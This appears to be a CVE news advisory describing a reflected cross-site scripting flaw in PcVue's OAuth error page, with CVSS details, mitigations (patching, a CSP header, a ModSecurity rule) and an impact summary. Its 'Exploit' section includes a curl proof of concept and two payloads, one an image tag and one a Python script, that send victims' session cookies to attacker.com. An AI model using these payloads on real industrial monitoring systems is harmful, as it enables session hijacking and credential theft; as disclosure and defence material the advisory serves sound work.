PcVue, Cross-Site Scripting, CVE-2026-1695 (Medium)

Listen to this Post

CVE-2026-1695 is a Cross-Site Scripting (XSS) vulnerability residing in the OAuth web services component of ARC Informatique’s PcVue software, specifically affecting versions 12.0.0 through 16.3.3 . The flaw is localized to the error page generated by the OAuth server when a user authentication attempt fails due to an “unknown client_id” . In this specific error condition, the application fails to properly neutralize or sanitize user-controllable input before including it in the HTTP response . A remote, unauthenticated attacker can exploit this by crafting a malicious link that, when clicked by a legitimate user, triggers a failed OAuth authentication attempt with a poisoned client_id parameter containing the XSS payload . This causes the victim’s browser to execute the attacker’s script in the context of the vulnerable PcVue web interface. The vulnerability has a CVSS v4.0 base score of 5.3 (MEDIUM), with a vector string of CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:N/AU:Y/R:U/RE:M/U:Clear, indicating a network-based attack with low complexity and no required privileges, but necessitating user interaction . Successful exploitation could lead to session hijacking, credential theft, or redirection to malicious sites within the context of the industrial monitoring application .

dailycve form:

Platform: PcVue
Version: 12.0.0-16.3.3
Vulnerability :XSS
Severity: MEDIUM
date: 02/26/2026

Prediction: Q2 2026

What Undercode Say:

Analytics

The vulnerability exists in the OAuth error page endpoint. An attacker can exploit it by tricking a user into visiting a URL with a malicious `client_id` parameter. The server reflects this input without proper sanitization, executing the script in the user’s browser.

Exploit:

Basic XSS PoC: Attempt to inject a script into the client_id parameter
Victim must be tricked into clicking this link after a failed auth.
curl -G "https://<TARGET-PCVUE-SERVER>/oauth/error" \
--data-urlencode "client_id=<script>alert('CVE-2026-1695-XSS')</script>" \
--data-urlencode "error=access_denied"
<!-- More stealthy payload example for session cookie theft -->
<img src="x" onerror="fetch('https://attacker.com/steal?cookie=' + document.cookie);">
Simple Python script to demonstrate the attack vector
import requests
target_url = "https://<VICTIM-PCVUE-SERVER>/oauth/error"
params = {
'client_id': '<script>document.location="https://attacker.com/log?c="+document.cookie</script>',
'error': 'access_denied'
}
print(f"[] Sending malicious request to {target_url}")
print("[] Requires user interaction (clicking link) to trigger.")
response = requests.get(target_url, params=params, verify=False)
print(f"[] Server responded with status: {response.status_code}")

Protection from this CVE

1. Apply vendor patch (upgrade to PcVue version 16.3.4 or 15.2.14 when released)
2. Implement a Content Security Policy (CSP) header to mitigate XSS execution.
Example IIS configuration (web.config snippet):
<system.webServer>
<httpProtocol>
<customHeaders>
<add name="Content-Security-Policy" value="default-src 'self'; script-src 'self';" />
</customHeaders>
</httpProtocol>
</system.webServer>
3. Use OWASP ZAP or Burp Suite to scan for XSS vulnerabilities.
4. Web Application Firewall (WAF) rule to block malicious client_id patterns.
ModSecurity Example Rule:
SecRule ARGS:client_id "@rx <script>" "id:1001,phase:2,deny,status:403,msg:'XSS Payload in client_id'"

Impact

Successful exploitation allows remote attackers to execute arbitrary JavaScript in the context of a legitimate user’s session. This can lead to session hijacking, credential theft, unauthorized actions within the WebVue, WebScheduler, TouchVue, and SnapVue features, and potential further compromise of industrial control system data .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top